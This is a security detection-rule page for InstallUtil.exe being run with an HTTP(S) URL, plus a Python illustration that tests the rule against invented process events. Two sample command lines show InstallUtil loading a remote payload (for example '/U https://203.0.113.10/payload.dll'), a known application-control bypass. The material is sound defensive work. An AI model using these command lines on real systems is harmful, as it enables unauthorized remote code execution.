
Summary
The detection rule "Windows InstallUtil URL in Command Line" fires when the Windows InstallUtil.exe is executed with an HTTP or HTTPS URL among its command-line arguments. The analytic is built on Endpoint Detection and Response (EDR) process-creation telemetry from Sysmon, Windows Event Logs, and CrowdStrike, and is intended to surface a pattern in which the signed .NET utility is pointed at a remote resource to download and execute code. Because InstallUtil is a trusted, Microsoft-signed binary, this pattern can be used to bypass application control and may result in unauthorized code execution, privilege escalation, or persistence on a compromised host. InstallUtil is legitimately used to install and uninstall local assemblies, so a URL in its arguments is unusual and warrants review. Analysts should correlate any hit with the parent process, the user context, and network activity from the same host and time window before drawing conclusions.
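The following is an added illustration of the detection logic described above, written here as an editorial example; it is not the rule's own search and is not part of the original page. It runs the two conditions (process name is installutil.exe, command line contains an http:// or https:// URL) over a handful of constructed process-creation events and shows why the check has to be made against the image name rather than the command line alone: a download tool whose URL merely ends in "installutil.exe" must not trigger the rule. All paths, IP addresses and command lines in SAMPLE_EVENTS are invented for this example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample process-creation events (not real telemetry), shaped loosely
# like normalized EDR/Sysmon process data: image path, command line, parent image.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # 1. InstallUtil run with a remote URL: should fire.
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "cmdline": r"InstallUtil.exe /logfile= /LogToConsole=false /U https://203.0.113.10/payload.dll",
     "parent": r"C:\Windows\System32\cmd.exe"},
    # 2. Ordinary local install of a vendor service: should not fire.
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe",
     "cmdline": r'installutil.exe "C:\Program Files\Vendor\Service.exe"',
     "parent": r"C:\Windows\System32\msiexec.exe"},
    # 3. Another binary with a URL that happens to mention installutil.exe: should not fire.
    {"image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe https://example.com/installutil.exe -o x.exe",
     "parent": r"C:\Windows\System32\cmd.exe"},
    # 4. Mixed-case scheme and explicit port, launched from PowerShell: should fire.
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "cmdline": r"InstallUtil.exe /u HTTP://203.0.113.10:8080/a",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]

# Scheme match is case-insensitive; the URL runs until whitespace or a quote.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def is_installutil(image: str) -> bool:
    """True when the executed image's file name is installutil.exe (any case, any path)."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1]
    return name.lower() == "installutil.exe"


def find_url(cmdline: str) -> Optional[str]:
    """Return the first http(s) URL in a command line, or None if there is none."""
    m = URL_RE.search(cmdline)
    return m.group(0) if m else None


@dataclass
class Hit:
    image: str
    url: str
    parent: str  # kept for the parent-process correlation the summary recommends


def detect(events: List[Dict[str, str]]) -> List[Hit]:
    """Apply the two rule conditions to each event and return the matching ones."""
    hits: List[Hit] = []
    for ev in events:
        if not is_installutil(ev["image"]):
            continue  # URL in some other binary's arguments is out of scope for this rule
        url = find_url(ev["cmdline"])
        if url is None:
            continue  # normal local install/uninstall, no remote resource referenced
        hits.append(Hit(image=ev["image"], url=url, parent=ev["parent"]))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"InstallUtil URL hit: {hit.url} (parent: {hit.parent})")
```

Run stand-alone, the script reports two hits (events 1 and 4) and stays silent on the local install and the curl download. In a production search the same two conditions are typically expressed as a filter on the normalized process name plus a wildcard or regex match on the full command line; whichever form is used, matching the scheme case-insensitively matters, since HTTP:// is accepted by the Windows networking stack just as readily as http://.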
Categories
- Endpoint
Data Sources
- Windows Registry
- Process
- Application Log
ATT&CK Techniques
- T1218.004
- T1218
Created: 2024-12-10